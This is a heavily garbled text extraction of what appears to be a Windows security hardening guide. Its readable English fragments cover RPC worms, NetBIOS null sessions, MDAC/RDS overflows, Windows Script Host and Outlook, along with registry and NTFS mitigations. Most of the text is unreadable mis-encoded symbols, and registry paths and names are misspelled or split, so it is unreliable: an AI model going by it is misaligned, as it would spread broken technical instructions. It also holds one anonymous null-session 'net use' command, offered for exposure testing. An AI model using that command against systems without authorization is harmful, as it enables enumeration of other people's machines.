6U )
6U )
Computer " $,
bP
P! ?), -,< E
1
6,
F)
I5
)
? @ ) 6 '? 5F
,6 3O *
Z
,
<
-,
6" E 0, 5
b
E
!89
E
- Y
"
$ P
75 I
) - "
23 , - 9*5 ) l ' GX) " - Y Z
:&27 RPC Remote Procedure Calls:[
"
] "), )
6*
" , GNT $pqqq $XP (& #
"
9P I nter process
Z F T/
) - " ) N ?&
0
' 7
F ,
3 '
)
3 - *1 ,
0_ B
.
F
\ " 785/ ( E
3
H F
- Y
)
,G 785/ ?
0,<
H F
2
Blaster/Msblast/Lovsan )
6" E - 5 ] 0
Nachi/ Welchia " - Y
0, 5
H $? &
$l ' R 4 S @ : " - Y
) - " ?&
6(
2
" _pqqs $
0, -
- Y l ' R4 S @ : "
Dos
R4 S @ ^
!
^P
$
RPC0
! ") *
0,
+,
H,, 2 e G
+
%K
bP
:
R4 S @ d *
7c #< d *
I5
% 'V < U )
?#
F
?
$l '
5
&
- .NETBIOS
T L.
&'Afentis security 0,<
A8 " %P
H 7 !89
#B
5! - . "
)@ +5F I 5
6@
2
a
0, 5
$
-,< h PH
NAT ("c
NETBIOS $, L
W L3
:
,G " ? NETBIOS - Y
"
Netbios Auditing Tool (
-,< K ) W L*
^
6*
! ". /0(123&
0 5 NAT 7 5B "
b
"), )
6
B
/
$
)
#)
" ) (E
- Y $% '
h @ " http:// www. Afentis. Com/resources/win32/nat - Y
0 5
" ,
v2.11 Legion N
${† ) {Š "), ) ?
% 'V <Legion b
" ,
-,< K Rhino9 #P< V <
$pqqq "),
)?
Checker)Security Fridays Share ? ,
) {† ${Š
6*
] "), )CE S @ d *
0,
U)
4 *
GX)
5 - Y
I5 _
SPC)Password
% 'V <
? # $l '
2 3@ ]
I5
0, 5 - Y _
R4Level password share "), ) ?
^P
NT ? @ )
] sp4 $pqqq $_,< -,< SL XP
Baseline Security Advisor S @ ? & W L3
:
R4SMB 0, 5 l '%#
)
0, 5
B
. ? &
"), ) ?
)
? 5 M 9
?
$pqqs )
("c A & R3
)- Y
( ,H $
R4 S @
" - Y Share net , 5 -,6
€" ?
" ,
6
)
( E ) - " ? & NT $pqqq $XP
0
$l '
<+
^P
6'
B5# 7 !89 "
,
pqqs )
1$
b3 n 9 " )
6@
]Net Share/ $
0_ 5 - Y
0
-, < K
' j
$
<+
<+
T 5! )
^P
6( E ],<
7 !89 S
a
‰8
- Y
" 7c
)
7
<
"), )
<+
W 3
<+ …
)% ' ^ P
$
:
u
!89 1 2
6( E " %P
H$
F) 1
)
I 5 0_ < ( E
" ?
u
1/ +
6@C
8
<+
7
?,
("c 2
W L3
L
7
u
u $-,6
$ I - .…
:
" ) - 3•…
3
6" E MR /
P
!&
DY/ ) -,< -
)
6 ,1'XP
"), )
< ,1'
V < ? 5 TG' g - .…
"), )XP
V <
"), )
a
6" E
6*
, N ) 6% '
"
6
- .…NTFS
<+
^P
e 'j 4
6" E
"), )…NT "), ) ) pqqq "), ) $XP S L " % P
H ] SP1 " E
$_
"7 L
Everyone 7 L ) Control Full0, <
"), )…XP ? @ )
SP1 " E
-, < SL Everyone )
$
7 L Read0,<
"), )…xp (
e 'j 4 7 L Sharedocs
<
User s/ Documents and settings/All C: /Documents " E
]
_
Everyone 7 L ) Full Control0,<
d *
H
+
Open Share
"
GX)
I5 +
" ?
"), )
GX)
# 0_, <
I5 $ F
5 ?N
) 25 $?N SMB
6*
5
6
<+
^P
R4 S @ ^
- Y % H
?@
:
d *
3
], <
File Sharing %K
^
Gibson Research Corporation " ?
&
"
6 N 4 SB
g
bP
2
I5
)
R4 S @
0 5
'
j 4
6&
a 5 - Y
…Nessus0 ) - " - Y
I5 -
) -,< ( N $?N j 4 &
a
…Winfingerprint N 4 aWin32 Host/Network Enumeration
A
A
:
+ A! A". /A
0(12A
3&Logon Anonymouse 9A
I 5 G?" \N( Anonymouse Logon
R4 S @
null Session0 K5
TG'$
b3 n 9 " ) "
$
" - Y
From Command Line Prompt:
C:/>net use// ipaddress/ipc$""/user:""
< +P
TL
? G ) -,<anonymouse
P
! & Null
$l '
-, < 'N I
System error 5
F " U4 #
'
F
Ipaddress d *
?@ ( ] user/:”
)_
hidden interprocess communications
E ]
H $l ' R 4 S @ : e G
& @
IPC$
E ;! $l '
P
4 $l '
)-
F) (, ! -, 6,
2 (E
F " U4 #
$
0_
n.
I 5 ("c " E
0 < ,6 *
=GX 2 %
R 4 S @ -, 6,
]% P
Hj *
-, <
'G
Winfingerpirnt d *
$+ A R
6 &'(
1
j 5 .Y
" 0
)
Nessus )
, 63
& _Null Session0 5 - Y $
I5 ?
A
$ <-
: A
A
A
+ A! A ". /A
0(12A
3&
NT
NTRK)(Resource
( regdump.
K F % ' % <$ ' ) #
n 9"
"), ) ? & NT
h @" ?
E
b3
+
&
:
XP
%
-)8! 0, 5
http://www. Afentis. Com/top20
0 5 - Y & _
]
F
#P< )
6&
K<@
I5 $
6
! ". /0(123&RPC
]
' ) #
Secutity Analyzer
I 5 A) 2
h @ n 9" ?
l'
9
Microsoft Baseline
$l '
0
-M2A
" - Y 0
-
K $
R4 S @ d *
http://www.
Microsoft.
Com/technet/security/tools/Tools/MBSAhom. Asp0 5
! "
'
456 123&
DY/ - .NETBIOSa
bP 785/ %
- Y ^
-
) pqqq $NT )
$ B
3
Patch-cheking , hotfix (
2
% H$
6" E TG' g 7 L
I "), ) ? &
$l ' &
n 9" h
7 , , j6
I5
,G
6 #6 " ?
:
2
a 5
5 ?@ " - Y
) X #
sharing ? 5 T G' g
0,<
CE ) {† ${Š "), ) ? ,
* ? G
User-Level share access control 7
U)
4
L $, <
NT "), ) Dmain "
0,
6% 'V < 0
0
) FTP n 9 "
? # $sharing " - Y
C
'
,6 3
sharing $S
?@
N
n 9 " b' -,< <R V <
&1 P
!& z
0, K5
, 1'
6 , 1'?
? &
7 ) X7
2 , 0, 6 ( E " E ) -,< , K ?
0
#4
sharing ? 5 T G' g
)
HTTP
R4 7
+
$S
? &
,
$
< +P " - Y
I5
Sharing
), . C
'
$7 ) X 7
)(E
,1'
:
0 <R V <
h @
sharing ?# ?
),.
0_,<
("c R 1$
?@ " $
E
<
$
DNS
F) ,
-, < K
u
S X j &' I 5
E
u
a 5 - Y
"
:
:
2
6
!89 $ 1 2
6T 5! " % PHBackup 7
" ?# $7 ) X Restore " ?
] ,E
?# ] 0 5 ip
#
-, < '
0,<
<
F) ? @ _
!89 +
"), )
NT "), )
F ? 5 Restore ) $j
F i
) $ Backup - .
4.0
F ? 5 Restore ) j
) $ Backup - .
F ? 5 Restore ) j
) $ Backup - .
pqqq "), )
) XP "), )
pqqs "), )
"), ) 7
L
, " Null sessions
" #
&
K6
2
NT Domain Controllers $, -, < ,
0
Windows NT Domain
pqqq "), ) " % P
H
6*
,63
3"
7 9P
#4
I5
pqqs|pqqq "), )
?# ]
-,< Z F P
)
1/
b
2#5
I
!89 ?& ?
,<
<
F)
I 2
F Restrict Anonymouse 9
$ pqqq "), )
6
$
•
"
- Y $_ , 5
5
1
) j6
6%
4) 6
#
h
), . T 5!
a 5 - Y
" 7c
"
5 $
,
I5 0
MR /
,6 3 )
7 !89 R3 null session " ?
:
$
! 5E
Anonymouse ?
"), )
- Y ?5F
T@ -, % / - 0,
- Y pqqsRestrict Anonymouse
, $
6 '
7 !89 K
),. T5!
NT
Restrict Anonymouse
"), )
F
,
" - Y
- .
pqqq
F
a 5 - Y
"
, Restrict Anonymouse 2 #< ;!
F
Domain 0
6, B
"), ) ?
%
bP
0,
DY/ - .
6" E )
$Service Pack 3
E
$l ', ,
" ()&17
SL "
u
:
E
u
] ,E
" ?# $7 ) X 7
"
)
7
$
" ?
-,<restore
:
)
E
-,<Backup
("c R1$
0, <
<
2
"), )
I5
/ )NT 4.0
E
0, < 2t5: $
6T5! " %PH
!89 +
3
u( E " %P
H 3
!89 $ 1 2
?@ " $
a 5 - Y
2#5 Trust
pqqq "), )
E
K
I 5 Restrict Anonymouse 1 " ?
, $ K " T#<
E i
NT 4.0 "), )
E ? 5 Resroe ) $j
) $ Backup - .
pqqq "), )
E•? 5 Restore ) j
) $ Backup - .
"
'
F) ? @ _
) XP "), )
E ? 5 Restore ) j
) $ Backup - .
pqqs "), )
n 9"
a K5
E
TP
), . T 5!
E ,B
E
I5
I 5 a #P<
" %/
), .
$ #P<
create the following Registry key
HKEY_LOCAL_MACHINE\SYSTEM\Current controlset\control
Secure PipeServers\winreg
Description:REG_SZ
Value:Registry server
- "
" F)
K 6)
j 4 7 5 I $"), ) SL ? "
0, 5
$l ', B e 'Access Control List
]
,
6)
" %/
$
a K5
)?
d*
3
$l ', B
,<
B
E
),. T5!
E
6" E ) 7 "
, Backup Operators
)
6" E
) Regedit32.exe ]
I5 , B
E
E
F
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Control
Edit
n 9 " Add Key
a "
Enter the following values:
Key Name: Secure PipeServers
Class: REG_SZ
a, B 2 '
F E F
-
H _ pqqq "), )
TP
_ regedit.exe
)
& O*
z
0,6
HKEY_LOCAL_MACHINE\SYSTEM\Current
controlSet\Control\Secure PipeServers
Edit
n 9 " Add Key
& O*
a "
z
Enter the following values:
Key Name: winreg
Class: REG_SZ
a,B 2 '
F E F
HKEY_LPCAL_MACHINE\SYSTEM\Current
ControlSet\Control\SecureServers\winreg
Edit
n 9 " Add Key
& O*
a "
z
Enter the following valuses:
Value Name: Description
Data Type: REG_SZ
String: registry server
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet
\Control\SecurePipeServers\winreg
0 Permissions
" E Z :!
) Security )
B $ winreg O *
I5 " E
)?
6-)
?
1/ 2
0 5 'X
( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor
0, K5
", -
E
"
$-,<
F)
0 5
E
#
1 u ,LH
-,< - < B
/ 2 3@ ?
^P
I
"E ?
)
i
$,<
<
), . T 5! a-,< , K ) - "
6U )
:
"
("c
6" E "
3 i: ?
, B
? @? 5 d*
AllowedPaths
^
]
5 =
Machine
G
2
$
0,<
E
< TP, $
account name U )
1 Z F T/ winreg T5! (,!
,B
),. T5!
P F7 [ ,
Directory Replicator ) service printer Spooler :
? )&'
#
^
I 5 "), ) , # 4
3
6, B
)$
), .
) Users a_
Bypass the access restriction:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\
SecurePipeServers\winreg\Allowedpaths
Value:
Machine
Value
Type:
REG_MULTI_SZ
-
Multi
string
Default
Data:
system\CurrentControlSet\Control\productOptionsSystem\
CurrentControlSet\Control\print\print\printersSystem\CurrentCont
rolSet\
Services\Event logSo ftware\Microsoft\windows NT\Current V
ersionSystem\
Current Contro lSet\Services\Replicator
Valid Range: (A valid path to a location in the registry)
Description: Allow machines access to listed locations in the
Registry provided that no explicit access restrictions exist for that
location.
Value:
Users
Value
type:
REG_MULTI_SZ
Default
-
Multi
string
Data:
Vaild Range:
(A
valid
(none)
path
to
a
location
in
the
registry)
Description:
Allow
users
access
to
listed
locations
in
The registry provided that no explicit access restrictions exist for that
location.
DY/ - .RPC
bP %K %
SL
:
2
A) 2
Windows Update ? 5 TG' g
#B
5!
^ P
Patch b
I
,G
), . T 5!
6MBSA
-, < K
6A)
:
)RPC h @ " - Y
http://www.ntbugtrag.com/dcomrpc.asp ("c 0, < , Y ,
- .
:
),. T5!
#B
5!RPC 2
U4 ) (E
#
?# Patch
B
5!
$
"), ) U )
g
0 5 T 5!
bP
) ? 5 TG' g
"
3 I
B
67
7
)
4
? '
<,
0
F)
2
# 2
" ;! ,
u,
? @ $ #B
5! .
$, <
,<
:
- <
3
2
F)
)
$
4
" ? 59 "
? 5 RPC
^
^
Š{s ) ‹‹Š ) ws{ ) wsŠ
‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8
) "), )
$ R4 S @ :
a 5 - Y
67
"
:
!89 +
E
4 ] "), )TCP
67
4)
_
),. T5! - .
K<@
I
-, < - <Windows remote Access Servivces
" ?
Security Bulletin Service & Hotfix Microsofts
editor windows server 2003 Registry) XP "), ) " - Y - .
access: Remotely accessible registry paths and subpaths
Network
Server 2003 Security Guide windows
! " % &# 08
Microsoft Data Acces Components
(MDAC)
MDAC
S @^
!89
" - Y
R4 MDAC
?5F
bP
0
" ,
-,< '
) 6, "
$l '785/ 0, 5 - Y _O * 7
a 5 - <
"2
E
B % !)
"
H
# $"), )
:
?
! E % <$
3
2
6*
"
,G
,G 785/ ?
), Z F]
6 # ) " - Y RDS
I ] 5 ,H
6 „1# "
3 M ,6
1
) ,<
<
F
$
R4 S @
,G % c ,
-,< K 7c L.
, ,F %K
F) ) _
overflow buffer - 9 *5
F
5 $
0 ",
RDS 7 5B "
MDAC $ "
S
Remote Data Services 5 , H *
H
) - " ?
0, 5 Z F $
, 7"
$
=GX
) 6" E - 5
78#
) 6=GX 0_
?@
B
F
* ] s) Š MS Access
!89
6
GX) 2 3@
6
T
3" 6
R4 S @ $_
6 ' ,G 7, ,
" j ) -,< 3 < %
5 ,H
R4 S @ B % c " $ 6
0,<
Microsoft jet
" ) j &'
]
I 5 ("c 7 ,
)-
B
. 7 L
=GX - 5 l '=GX Microsoft jet Database
Database Engine "
-, < h PH
6
F) 0
S
: $l '
-,< K )
, # 4 (,!
)- # (N
F
) 6, "
0, -,
!
785/ l '=GX " - Y
3 785/ "
# Buffer Oveflow
?
?5F
(E
%1
, $ :
- 5<
MDAC0,<
P
3]21 MSO3-033 *
_
5
R4 S @ : 2
0
MDAC
-, < - < ?@
$pqqs "), )
' ) #
$() *
"), )
IIS
Q NT
6
)
T)J) $ RDS
) j<
l'
6*
=GX
SQL " MDAC
0, <
6*
] SP2$_
Q$ <
l ' R4 S @ :
+
‹) q
$,< -,< SL w)Š
) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ )
* SQL Server 7 ? @ )
?@ )
, 56SPI $_
K6
-, < SL , G ) Server 2000
-,6
N 560, 5
- Y
"), )
! ". /0(123&
"), )
)
% ' F) W L3
NT 4.0 - 5 IIS SL
#
)
*
$,< -,< masdcs. Dll” % '] < ( E
("c
C 5! l 'files\Common files\System\msadc\msacds.dll c:\program
h @
#
0_, < 7) Y
) "
,
#4
F
2#5 l 'h @ $
patching 2
( N $,< l '% '% < I
% ! 6
) 5 ,H
7 K
&F "
6 @
6 &'(
I5 0 < , 6 3
F) 7
0
H$
: $
(E ?
HS @),, e G
$-,< - <
("c
3
" ?
(
:
W
(N
W L3 MDAC- 5<
R4 S @ ^
2
0 5 - Y
L3
("c
( ,H
F b < S
)(E
R4 S @d *
2<
)
0
-,< i
3
-, < SL
6 &'
456 123&
:
RDS $Jet " ?
? @
h @http://www.wiretrip.net/rfp/txt/rfp9907.txt &
DY/)
I5 &
"
! " %&
6=GX
' ) # Windows update
$l '? # 0 5 - Y $
0 5 ,6 3 6 &'(
MS03-033
21 " ?
- .?@
R4 S @ : 2 %
_
B ) i.L - . )
' ) #
P
3]2 1 2,
0 5 - Y
:
2
http://support .microsoft. come/support/kb/articles/q184/3/72.asp
http://www.microsoft.com/technet/security/bulletin/ms99-004.asp
http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
http://www.microsoft.com/security_bulletins/ms03-033.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet
/security/bulletin/MS03-033.asp
http://support.microsoft.com/default,aspx?scid= kb;en-us;82378
?
ver
*
$l '
2 3@ 0
=GX
3
$†$p MDAC
Z
I MDAC *
!89
6
F MDAC
bP
!
)
h @ n 9" ?
http://msdn.microsoft.com/library/default.asp?url=download/list/dat
aaccess.asp
" ?
0 5
:
2
0 5
'
) -,6 windows update - Y &
! " % &# 5,
Scripting Host(WSH Windows)
WSH
)
4 #
)
#B
5! j &' I 5
6*
„ 1 # 0_
-
- 5
6, " - Y
N
4 -,
,
6
#
U
l ' 6%
$"), )
4] , 5
-,<desktop
0_
5/
) K f4 *
F $% '
I ],
„1# $
K "), ) % !VSH ?# $
?@ " g@],
F
-,< K
? G
)
K "), ) 7 B
5! ?
n 9" C
5
,
- 56{† "), )
b
"), )VBScript P 21
) )
) F " $l ' „ 1 # 0,< ?
- 5 IE
') #
Z F
4
6' 4 #
)
-
? 5 ,B )
n 9"
)
4 #
% '
0_ # ) #1
ZF
-,< < VBScrip 0,
b
"
3O * M 6
7
%
3
% '\
vbs,. Vbe,js, .jse0) 0wsf
6 '$
B ;!
I 5 $, ,
& WSH O G
0
) X ! B % !$ ILOVEYOU , ]
J)WSH(
)
)
-
‰ : " U4
6
K6(
F ?# $S
T)J)
#
<R ? 1
_
) l '(
2 , 0, - 5 - Y
? G $jscript
6" E
i:
$() *
WSH K
)
#
- 56
)
#B
5! j &' I
) F " $l ' „ 1 # 0, <
P IE *
„ 1 # 0_
WSH
-
4 -,
)
Z F
U)
n 9"
-,< K
? !
?@ " g@ ] ,
E $% '
b
„1# $
6VBScript 2 1
) )
"), )
,
- 56{† "), )
N
I ],
0_ # ) #1
- 56
') #
5/
) K f4 *
K "), ) % !
$"), )
)
#
6
4
?# $
-
6, " - Y
ZF
J)WSh (
) X ! B % ! $ILOVEYOU ]
-,< < , VBScript 7
b
M ,6
%
I
0, ,
3 c
‰ : ?@ " U 4
3 O * WSH % '\
& "
wsf.vbs,.vbe,js,jse
OG
0
6 '$
)
$() *
"), )NT "), )
2 3@
6
<R ? 1
K6(
F ? # $S
)
i:
-
TJ)
) l '(
_
0,
2 , 0, - 5 - Y
#
? !
Jscript
6" E
+,
WSH n 9 "
*
B ;!
)
7
$IE )
,
$_, G
f4 *
]
SL {Š ) ME,98,98SE,2000,XP ) WSH,2003
0
'
0
Windows Scrpt
SL e 'j 4 7
h @ " ? Windows Download Script0 5 - Y
+
! ". /0(123&
-,< SL IE5.5 *
- 56 NT
) {Š "), ) ? @ )
K6
•
0
-,< SL pqqs ) XP $ME ${† "), ) ? @ )
0
WSH
#
W L3
0
$, <P -, < T
("c
("c :
K6
WSH A) " - Y
DY/
I
:
2
?@
K6
' ) SL
0 < ,6 3
)(E
#6
•
)
HS @e G
-,< SL ? @ )
" $,< ,6 3 - < ? @
,G j*
K6
- Y $?@ %
! " %&
$
456 123&
, 7 B
5! ) 6
" - Y , " WSH
0,< , 6 3 F
T#<
3
$l '%
l' 6
? 2 & * BWSH
- <
# 2
4 MR/ ) ? 5 TG' g 7
("c ,
)-
„ 1 # WSH ? 59
T G' g
?
) MR / $ 6
bP
%K
)-
) "
,G
) 785/ %
WSH 5 "
)
?@
"), ) % !
?@
DY/
#B
5!
"
I
#
3
3
* $
N ?), )
$
]
40 5
TG' g l '%
4$
0_,<
Noscript.exe b
8
$ WSH
6h8 % '( Wscript.exe
) Cscript.exe
6, BShell\Open2\ Command
E
6
6 ^
-,< K $ Sysmantec U )
#
5
SL
F W L3
I
("c
) Shell/Open/Command $
N 4 $S
0, < , 6 3 ( E $? @
Noscript.exea K5
TP
Y
2 , 0, 5
)
P
Q M , 6 " I'
" Noscript.exe
$ Norton Script Disabler/Enabler
) TG'] WSH
GX) 2 3@
Z F " U 4•
F
#B
5! W
6A"
L3
("c
4Desktop
K6% ']
#
wsf0.vbs,vbe,js,jse, $
OG
6% '] -
?# ?
6
-, < ( E
#
$-, < <
N 4)
-
j 5
6 '?@ ? 5 TG' g
,
DY/
$ 5 %K
I
6% ' "), ) e 'j 4
,
#4)75I
j 5
6
2
6% '
u
.
3
, )
" ? 59 " U 4 ,
'?
- .0
EXE
u_
) COM ) _
0, < , 6 3 Z F ? @ B '8
("c ? 59
0 5 6 '$" E
F%
#
F
"), ) e 'j 4
FWSH ?,< TG'(,! W L3
#
WSH ( E
) 7 , , ? 5 m .1
6% ' ^ P
"), ) K F
) / % '?, < T G'" U 4
,6 3 -
_ <
_(WSH
^
OG
•
'
] Noscript
0
)
T G' g
" %/
Symantec
) T G'? # $_TG' g
u
I
?
g
MR/
6
#
% '$
#
$S
2, 0,<
K6
#
0
-, < T
"E
?
0 5 d*
0, 5 •*
T /2 !
) ), . $,
# WSH ?
6
6
! $2
?@
F W L3
("c 5L
S @), ,
G
I 2, 0 < , 6 3
@? !
Z F ?# ? `56$
) / % '( csript.exe
#
0 wscript.exe
)= G
Cscript.exe myscript.vbs
? 5 TG' g
) MR/ - .
:
7 !89 S
WSH
I
h @" ?
http//www.symantec.com/avcenter/venc/data/win.script.hosting.html
0 5 - Y
,`
:&"
-, < ( N U ) )
? 5 TG' g
^P
I
3
$l ' 6 &'(
O *
6% ' I ] 0
6
#
( E
WSH0, 5
b
-, < K
6(
$S
6%
) / K5 X
, <
.scr.vbs,js,jse, wsf,bat,
Script Blocking
4gatways U )
SL $? & ) ? , 6 WSH ?
-)8! ]
("c
@
$
2, _
4" - Y
# ) #1 6
) 6h )
)exe pif
and
8Q _Norton AntiVirus 2001 ? # $, G
C
P
6h) ) %
? & ,
K
DY/
a; [
,Z 2(2 +
WSH " ?
QS $
?@ *
2 3@ 0
h @Windows Script Download0 5
'Z
7 G', $ 3 ? 1
'
+ , 2R NTFS
6" E " NTFS h
wscript.exe ) jscript.exe
% H
?
i: = G
"
K6-)
)?
I
?
^P
9
- 56account
V <
% ' )
#
% ' )
" 0 5 - Y $"), ) PG
e 'j 4 7 5 I $ <
6% ') 6
Full Control -)
$‰8
W L3
l 'e
) Everyone
$, <
?
?
5 $S
2, 0 <
("c " E
'j 4 7 5 I 0, <
$ 6
0, ,
+
:
uNTFS
6" E
TP
5 % <
'
I
25 0, <
5 S
K6-)
)?
) X
" %/
$
) 6% 'MR / ) T
wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' "
I
<R V <
<R NTFS
e 'j 4 7 5 I $ <
7
6
% ' )
^P
a K5
25 , LH
B' )
O * $My Computer ? 5 TG'•
$
0,<
_% '$
$
u , LH
] -,< O *
0 K5
d*
9
-)
$?, 3] " E
L3 Y.
O*
tab 7
(,! Deny )
?# Allow
% '
Property $
?&
% ,P
% '
I
)
$
NTFS
convert drive_letter:/fs:ntfs
6" E NTFSah @ " ?
bP
\ $Pemission j*
0, 5
#
Security j *
F) ?@
)
^P
.Y
F) ?@ "
Property Y. ? 5 TG'•
< ^
Account $d
I
<
5 -,6
" ?
I - . W L3
% ' )
d*
6" E
•
& 0 K5
_000 ) 2 <
Security
$% ' ^
NTFS 0
•
-,
, #4
$ Convert ] 0 5 - Y
7 !89 S
I5
$
http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp
sc.htm
0 5 - Y
! " % &# 0,
Outlook Express, Outlook Microsoft
Outlook 7 !89
$l '
0
') #
$ 6h 5
b
$_U '@
-,< K
, ?# $ # ) #1
^P 7
0, 5
Exchange ) K
4"
K $
K6
0, <
"2
-, < K
0_
-
? &56
‰:
Outlook98 y
SL 7
P
# ) #1
0
I
5
6
BH
)
-
$ F
!" V
8Q 0, < , 6 3
C
A
0 ' ,6 3
3W 3
6%
4
H I W L3
) ?N
IE
^
- Y
F
6*
%/ -
"
6
J) 0
-
,E - Y
9
) U '@$
, ) T) ,
)
1
) < ,6 3 TP
N P ?@
6
- Y
*
?), ]
$:
, "
T#< ")
=GX
[
7
F) 7
G ) - ), .
?@ " - Y Z
")
B
5! b.
, N : <2
C
G:H
6j1 $2t5: ) 25
S
*
" - Y 0, < , 6 3 6 '&
F =GX $W 3 L !
I
$
6 &'(
SL ?# _ c
$l ' # )
3
$
) rendenring 0, 5
6 )
H ? 5F
*
?@ - 56
, 1
6 '$( '784 2
, G 7c L.
!
]
56${Š "), ) 'G ? " " ]
' ) #
Outlook 98
IE - Y a? `56 P
Q
4 -, 6 U )
=! > ?@
SL
? !
4 " HTML
2
-)8!
Server
V < ? " $7 H8
IE
-
Yc j*
5 ? !
) L*<
1
) 7 ,3 K
Backoffice „ 1 # " - Y ? # $"), ) % !
$
U)
*]
6
c L. n YBIE ) OE
I
4 -,
5/ 0
)
Express Outlook ] _OE
Outlook K
! 5E "
? " ) 6 1G'Oulook
"
4 l),
F
# ) #1
bP
b
2,
5 $
6 &'(
4
6 '&
$_ ' ) #
("c 78
%
,
- 4$ ') #
BH
M ,6 "
# 0 < ,6 3 T
# ) #1 6
) 7 !89
,
,
\X
2 )-
$ # ) #1 6
0,<
< TP
O *
&'(
P
6h) )
6@
& ? 5 About
I
n 9 " Help
l'
f4 "
Outlook ? !
Z
0
,
:3 ) 7 , , ")
# ) #1 6
-,
"
*
2K4
0 ' 6 @
6*
6N F e 'j 4 SL ] 0
,G
- 5< " ?
?) ' 6 BH
3"
$IE )
F " U4 $IE TG' $
>! ? !
) ,< ,6 * SL
Outlooka
U)
l ' &'(
6
K U '@-
$?@ SL W L 3
_
-,< K
"), )OE
0
B '8
0, < -
6T
/ "
5 - 56 -,< K
"
, ,F *
-,< E
+,
6*
*
G
6, ) 6(
$() *
OE
e
)
!89
6)
$
,
$
,F
)
7
5L
6*
Outlook9 •
Outlook97 •
_ <
Y & Outlook2002
_ <
& ? 5 TG' About
*
pqqq "
a 5 - Y
"
] Outlook 2000 •
) Outlook10 ?@
] OutlookXP •
n 9 " Help
- 5< " ? OE 2K4
!
Y & Outlook9 ?@
6*
Patch +
0 ' 6@$
" ?
!89
-http//www.microsoft.com/windows/oe/.
-http//www.microsoft.com/office/ outlook./
+
! ". /0(123&
F " U4 ] IE
:
)
2
_
-,< SL
0,
(N )
) SL "), ) % !
6
?@ - 56
Outlook Express
" * IE
$U '@ 6
SL
*
"
,6 3
,<
! 5E SL
" - Y
( ,H ? Outlook -, < K
( N (,! 7
0, <
H, , e G
?@ )
K6
0
-,< SL &
0 < ,6 3
HS @e G
0 5 OE )Outlook
6*
3W 3
$ 9
5
%K
75 I
& A
! (,!
#
) -,< SL
0 <
! " %&
456 123&
"2
a
(E
F 7 , , j6 ) l ' R4 S @ %
YB* 7 B
5!
# Outlook
+
6
"
Outlokk Express
e 'j 4 7 5 I ) SL Outlook ) Outlook Express
7 5 I W L3
4
DY/ I 5
("c
W L3 2
0,
:
2
0
=GX
2t
5: -,< SL
*
?
(N " ) (E
a
SL ) http//windowsupdate.microsoft.com/
. ] Critecal C L 3 -,< K
_
n 9 " Layout
0
6
,
& O*
0_Preview]
6 'Show Preview Pene
bP
" 5
Security Zone]
) O * Options
& ? 5 TG' g
n 9"
a,<
:
I
" View
5#.
2
•
0 # ) #1
High I
<b 2 "
$7 !89 "
6
5
1
) % 4 ? 5 T G' g •
0 < '
?
6Patch
/ 7 5I ? 5
& Tools
- Y •
) A" @
) X?
25 , @ ' ^ P
,
# ) #1 6
"
•0
% !
" - Y
K ?@
j
:
("c
?
F
$, < 2t5: ?@ -,
T
+P
6h) ) W L3
/ $ 5 5X % '
("c
'
•
? "
$?@ ? 5 TG'" %P
H) ,
0 <( E
"
g ] , 1'
? !
? ,
6h) ) "
6% '
"
("c $ 5 5 X % '
" ,G b
'
5 5X
'
$l 'h @ ] 0 5 - 3•_MY Documents
6% 'S
#Y ]
5 O*
N
_
("c 0 <
3
# ) #1
XSL
% <,
0,6
' ) #
" - Y
macro Disable
I
6% ' /
'
F
# 2
,<
% '
*
6,
•
("c #
High ,
&
)
- <
HS @),, e G
7c L.
:
6% '? 5 T G'" •
- 56 5 5 X
) DOC
•
? "
$_Word
I]
TG'
0 < '
`
:&"
6
!89
DY/ W L3
6
0, 5
DY/ " ? 59
"
K $O *
(N
(N 7 B
5! $h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
)
6
-,6
# ) #1 6
? ,
?"
h)
h @" ?
6
U)
$O * Π#
)
@
6
NY67
6
)
(E
5 j 4)
@
) 6h) ) "
) 5 5X
@
7 L
6
" - Y " %P
H h) )
,
Q%
Q $7 , , 2 , ,F %
0, 6
)-
6 &'(
L %H , / 6h) )
, , " %P
H $Π#
n 9 " 6(
@
) 6h) ) $ 6(
6
I5 -
? @b
7 # $h) )
6,
I 5 0,
BH
$
P
DY/ 6 & $
" ,G 0,
6% '7 L
+F
)O * , % <
(N
# ) #1Preview $
I 5 0,
$ '
http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y
A
) #
QS $Outlook
+
Express OutlookG
Outlook Express j &'M,6 ]
$l '
*
"
2 3@ '
I 5 0_ c
g] , 1'
?@ ,
? G 6h) ) "
"
/ )
N
6% '
'
7 G',
'
3
2
_
O*
6% 'S
#Y]
F
\) < :
5 O*
N
) DOC
0,6
' ) #
macro Disable
)
6% ' /
0
- <
" - Y
'
,<
% '
*
6,
•
("c #
High ,
&
F
# 2
HS @),, e G
7c L.
<
- 56 5 5 X % '? 5 T G'" •
# ) #1
XSL
% <,
•
? "
0_
("c 0 <
9
l 'h @] 0 5 - 3•My Documents
,G b
5 5X
3 ?1
5 ) 6 BH
("c 5 X % '
, 1'?
"
'Z
_Word
I]
T G'
0 < '
`
6
DY/ W L3
!89
6
, 5
(N
(N 7 B
5! h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
$
)
-,6
6,
I 5 0,
BH
6
# h) )
K $O *
DY/ " ? 59
"
P
? @b
U)
? "
$O *
@
6
6
# ) #1 6
? ,
h) )
I
#
+F
,
:&"
6 &'(
) 6h) ) $ 6(
NY67
6
6
)
(E
6
) 6h) ) "
I
7 L
5 j 4)
, , " %PH $
) 55X
@
Q 7 , , 2 , ,F %
0, 6
)-
Q%
L %H , / 6h) )
" - Y " %P
H h) )
n 9 " 6(
@
I
#
@
)O * , % <
DY/ 6 & 0
" ,G 0,
6% '7
0,
A
L
(N
# ) #1
$Preview
.
http://www.microsoft.com/security h @ " ?
$ ' ) #
0 5 - Y /protect/antivirvirus.asp
Outlook Express
M, 6 ]
'Z
" ?
7 G',
$l '
" ? 59
*
'
I 5 0_ c
U '@ 6
)d *
7 L l'
.
7 K
&F "
6 @
I
